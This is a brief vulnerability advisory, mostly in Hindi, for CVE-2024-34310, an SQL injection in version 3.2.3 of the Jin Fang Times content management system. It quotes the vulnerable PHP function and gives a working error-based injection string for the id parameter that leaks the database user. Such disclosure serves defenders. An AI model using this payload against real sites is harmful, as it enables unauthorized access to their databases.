
CVE-2024-34310
CVE-2024-34310
[सुझाया गया विवरण] जिन फैंग टाइम्स सामग्री प्रबंधन प्रणाली v3.2.3 में id पैरामीटर के माध्यम से एक SQL इंजेक्शन भेद्यता पाई गई।
[भेद्यता प्रकार] SQL इंजेक्शन
[उत्पाद का विक्रेता] https://www.bjjfsd.com/
[प्रभावित उत्पाद कोड आधार] Jin Fang times content management system - 3.2.3
[प्रभावित घटक] public function data_show($id = 0) {
if (empty($id)) { $this->redirect('index'); }$info = M('News')->find($id);
[हमले का प्रकार] दूरस्थ
[प्रभाव कोड निष्पादन] सत्य
[प्रभाव सूचना प्रकटीकरण] सत्य
[हमले के वेक्टर] m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)
[खोजकर्ता] yishan
[संदर्भ] http://jin.com https://www.bjjfsd.com/
CVE-2024-34310 का उपयोग करें।